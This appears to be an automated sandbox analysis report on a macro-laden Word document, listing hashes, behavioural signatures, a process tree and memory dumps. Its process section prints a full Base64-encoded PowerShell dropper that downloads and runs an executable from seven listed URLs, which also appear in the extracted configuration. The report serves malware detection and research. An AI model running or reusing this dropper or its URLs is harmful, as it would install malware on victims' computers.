Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-09-2024 22:13

General

  • Target

    ee8691df830c8049a82b6742c7b87ab9_JaffaCakes118.doc

  • Size

    139KB

  • MD5

    ee8691df830c8049a82b6742c7b87ab9

  • SHA1

    fc0b9af297d018fd313934248f5e7e9aac4752da

  • SHA256

    a973fb7943766b57cd43a3411ebc0e4f2526142e27a0c7e259a0fdabd30a5596

  • SHA512

    52cf16dc38ff9391c343b4a3058b3da0d51a4b2a89ec3a066d61d0596fb01e9c239b01a7ec1cb9d87267555e467c9511ebc16eb0dbc2a0618077745109724eaf

  • SSDEEP

    1536:mxRD3bNqfNpu39IId5a6XP3Mg8afyqsTqc380Y:ER1qf69xak3MgxyHqI80Y

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://edu.jmsvclass.com/wp-includes/sZmjSq/

exe.dropper

http://darkblessing.net/e4wftkpn/KNAO9/

exe.dropper

http://trancisconsulting.com/wp-admin/EEoF/

exe.dropper

http://devanyastore.com/wp-content/9J56juA/

exe.dropper

http://healthcureathome.com/ALFA_DATA/iKSdCK6/

exe.dropper

http://www.szwymall.com/wp-content/j29mvS/

exe.dropper

http://www.jornco.com/wp-admin/UT0xBJw/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ee8691df830c8049a82b6742c7b87ab9_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2736
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1032
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD JABNAHYAbQA5AHgAZABwAD0AKAAoACcARwB2AHkANgAnACsAJwB0ACcAKwAnAF8AJwApACsAJwA4ACcAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUATgB2ADoAVQBzAEUAUgBwAHIATwBGAGkATABlAFwAVAA0AFkAeQBlAFIAOABcAGgASgBfAE0ARgBaAFYAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAHIAZQBjAHQAbwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBjAGAAVQByAGkAYABUAGAAWQBwAFIATwBgAFQATwBDAE8ATAAiACAAPQAgACgAJwB0AGwAJwArACgAJwBzACcAKwAnADEAMgAsACAAdABsAHMAJwArACcAMQAxACwAJwApACsAJwAgACcAKwAnAHQAbAAnACsAJwBzACcAKQA7ACQAQgAzAHUAbwBuAHQAMQAgAD0AIAAoACgAJwBPAG4AagAnACsAJwAyACcAKQArACgAJwBxACcAKwAnAG0AegAnACkAKwAnAHQAJwApADsAJABJAGQAdAA2ADQAZQBuAD0AKAAoACcARAA4ACcAKwAnADMAaAAnACkAKwAoACcANAAnACsAJwB1AHkAJwApACkAOwAkAFoAcgB0AG8AMwA2AGYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAYwAnACsAJwBHACcAKwAoACcATAAnACsAJwBUADQAJwApACsAKAAnAHkAJwArACcAeQBlACcAKQArACgAJwByACcAKwAnADgAYwAnACkAKwAnAEcAJwArACgAJwBMACcAKwAnAEgAagBfACcAKQArACgAJwBtACcAKwAnAGYAegB2AGMARwBMACcAKQApAC4AIgBSAGUAYABQAEwAQQBDAGUAIgAoACgAWwBDAGgAYQByAF0AOQA5ACsAWwBDAGgAYQByAF0ANwAxACsAWwBDAGgAYQByAF0ANwA2ACkALAAnAFwAJwApACkAKwAkAEIAMwB1AG8AbgB0ADEAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABJAG8AdAA1AGMAegBrAD0AKAAoACcATQAnACsAJwAzADMAcQA2ADAAJwApACsAJwBmACcAKQA7ACQATgByAG8AbQBvAGcAcgA9AC4AKAAnAG4AJwArACcAZQAnACsAJwB3AC0AbwBiAGoAZQBjAHQAJwApACAAbgBFAFQALgB3AGUAQgBDAEwASQBFAG4AdAA7ACQARQBvADYAMQB4AGMAbwA9ACgAKAAnAGgAdAB0AHAAJwArACcAOgAnACsAJwAvACcAKQArACcALwAnACsAJwBlACcAKwAnAGQAdQAnACsAJwAuAGoAJwArACgAJwBtAHMAJwArACcAdgAnACkAKwAoACcAYwBsAGEAcwBzAC4AYwBvAG0AJwArACcALwAnACsAJwB3AHAALQBpAG4AJwArACcAYwAnACkAKwAoACcAbAB1AGQAJwArACcAZQBzACcAKQArACcALwBzACcAKwAoACcAWgAnACsAJwBtAGoAJwApACsAKAAnAFMAcQAnACsAJwAvACoAJwArACcAaAB0ACcAKQArACcAdABwACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AJwArACcAZABhAHIAJwApACsAJwBrACcAKwAoACcAYgBsAGUAcwAnACsAJwBzACcAKQArACcAaQBuACcAKwAoACcAZwAuACcAKwAnAG4AZQAnACkAKwAoACcAdAAvAGUAJwArACcANAB3AGYAdAAnACkAKwAnAGsAJwArACcAcABuACcAKwAoACcALwBLAE4AQQBPADkALwAqAGgAdAB0AHAAOgAvAC8AdAAnACsAJwByAGEAJwArACcAbgAnACsAJwBjAGkAJwArACcAcwAnACsAJwBjAG8AbgBzACcAKQArACgAJwB1ACcAKwAnAGwAdABpACcAKQArACcAbgBnACcAKwAnAC4AYwAnACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAcAAtAGEAJwApACsAJwBkACcAKwAoACcAbQBpAG4ALwAnACsAJwBFAEUAJwApACsAJwBvAEYAJwArACcALwAqACcAKwAoACcAaAB0AHQAcAAnACsAJwA6AC8ALwAnACsAJwBkAGUAdgBhAG4AJwArACcAeQBhAHMAJwArACcAdABvAHIAZQAnACkAKwAoACcALgBjACcAKwAnAG8AJwApACsAJwBtAC8AJwArACcAdwAnACsAKAAnAHAALQBjAG8AJwArACcAbgAnACsAJwB0AGUAJwApACsAJwBuACcAKwAoACcAdAAvACcAKwAnADkASgA1ADYAJwApACsAJwBqAHUAJwArACcAQQAnACsAKAAnAC8AJwArACcAKgBoAHQAJwArACcAdABwACcAKQArACcAOgAvACcAKwAnAC8AaAAnACsAKAAnAGUAJwArACcAYQBsAHQAaABjAHUAJwArACcAcgBlACcAKQArACcAYQAnACsAKAAnAHQAJwArACcAaABvAG0AJwApACsAKAAnAGUALgAnACsAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBBAEwARgAnACsAJwBBAF8AJwApACsAJwBEAEEAJwArACcAVAAnACsAKAAnAEEALwAnACsAJwBpACcAKQArACgAJwBLACcAKwAnAFMAZAAnACkAKwAnAEMAJwArACgAJwBLACcAKwAnADYALwAqAGgAJwArACcAdAB0ACcAKwAnAHAAOgAnACkAKwAnAC8ALwAnACsAJwB3AHcAJwArACcAdwAnACsAJwAuAHMAJwArACgAJwB6AHcAJwArACcAeQAnACkAKwAnAG0AJwArACgAJwBhAGwAJwArACcAbAAuACcAKQArACcAYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACcAdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AJwApACsAKAAnAG4AdABlACcAKwAnAG4AJwArACcAdAAvACcAKQArACcAagAnACsAKAAnADIAJwArACcAOQBtACcAKQArACgAJwB2ACcAKwAnAFMALwAqAGgAdAB0ACcAKwAnAHAAOgAvACcAKQArACgAJwAvAHcAdwAnACsAJwB3AC4AJwApACsAKAAnAGoAbwByAG4AYwBvAC4AYwBvACcAKwAnAG0AJwArACcALwB3ACcAKwAnAHAAJwArACcALQAnACkAKwAnAGEAJwArACgAJwBkACcAKwAnAG0AaQBuACcAKQArACgAJwAvACcAKwAnAFUAVAAwACcAKQArACgAJwB4AEIAJwArACcASgB3AC8AJwApACkALgAiAHMAYABwAGwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAVgBtAGwAXwA4AHIAcQA9ACgAKAAnAEgAJwArACcAeQBvACcAKQArACgAJwBkAGUAJwArACcAbAAyACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAQgBrAHUAXwB0AGQAXwAgAGkAbgAgACQARQBvADYAMQB4AGMAbwApAHsAdAByAHkAewAkAE4AcgBvAG0AbwBnAHIALgAiAEQAYABvAGAAdwBuAEwATwBhAGQAZgBpAGwARQAiACgAJABCAGsAdQBfAHQAZABfACwAIAAkAFoAcgB0AG8AMwA2AGYAKQA7ACQAUABuAGYAOQBmAHoAdAA9ACgAKAAnAFYAZwBvAGEAJwArACcAbgAnACkAKwAnADkAJwArACcAbQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQAWgByAHQAbwAzADYAZgApAC4AIgBMAEUAYABOAGcAYABUAEgAIgAgAC0AZwBlACAAMgAzADIANQAzACkAIAB7AC4AKAAnAEkAbgB2AG8AJwArACcAawBlAC0ASQAnACsAJwB0AGUAbQAnACkAKAAkAFoAcgB0AG8AMwA2AGYAKQA7ACQAWABvAHEAaQB5AHIANQA9ACgAKAAnAEIAdQBvACcAKwAnAGwAaAAnACkAKwAnAGkAZgAnACkAOwBiAHIAZQBhAGsAOwAkAFkANgByADUAaAAxAGUAPQAoACcAUwAnACsAJwBmACcAKwAoACcAMgBkAHEAJwArACcAZABuACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABGAG0AaQA5AGsAdgA5AD0AKAAnAEkAXwAnACsAKAAnAGQAZgBlACcAKwAnAG0AeAAnACkAKQA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2960

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      56122b893fb0b37784f95ff7000e434a

      SHA1

      0d4fc9f3c141174e1eaa7ba7260bfbd426a8aa7b

      SHA256

      00ea5a078101bccc78bb0cbcaf61d449ddf7b7d97be3c98b9be17496286aeca9

      SHA512

      6c5073c222a8aa8656c553d3bbd2159dd5b091d865fce34c52772442fe2b0b8fb66c7b8f269b718959cc2b6328f8d149c1ea4f8616789166eaa41aca43c9dc2e

    • memory/2736-32-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-86-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2736-6-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-5-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-7-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-10-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-19-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-14-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-28-0x00000000055D0000-0x00000000056D0000-memory.dmp

      Filesize

      1024KB

    • memory/2736-24-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-20-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-18-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-16-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-15-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-13-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-12-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-40-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-9-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-8-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-37-0x00000000055D0000-0x00000000056D0000-memory.dmp

      Filesize

      1024KB

    • memory/2736-36-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-0-0x000000002F7B1000-0x000000002F7B2000-memory.dmp

      Filesize

      4KB

    • memory/2736-43-0x00000000055D0000-0x00000000056D0000-memory.dmp

      Filesize

      1024KB

    • memory/2736-2-0x000000007141D000-0x0000000071428000-memory.dmp

      Filesize

      44KB

    • memory/2736-11-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-47-0x00000000055D0000-0x00000000056D0000-memory.dmp

      Filesize

      1024KB

    • memory/2736-48-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-46-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-41-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-38-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-39-0x000000007141D000-0x0000000071428000-memory.dmp

      Filesize

      44KB

    • memory/2736-31-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-30-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-29-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-87-0x000000007141D000-0x0000000071428000-memory.dmp

      Filesize

      44KB

    • memory/2736-42-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-56-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-61-0x00000000055D0000-0x00000000056D0000-memory.dmp

      Filesize

      1024KB

    • memory/2736-66-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-67-0x00000000055D0000-0x00000000056D0000-memory.dmp

      Filesize

      1024KB

    • memory/2736-68-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-69-0x00000000055D0000-0x00000000056D0000-memory.dmp

      Filesize

      1024KB

    • memory/2736-70-0x0000000000660000-0x0000000000760000-memory.dmp

      Filesize

      1024KB

    • memory/2736-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2960-55-0x0000000002220000-0x0000000002228000-memory.dmp

      Filesize

      32KB

    • memory/2960-54-0x000000001B280000-0x000000001B562000-memory.dmp

      Filesize

      2.9MB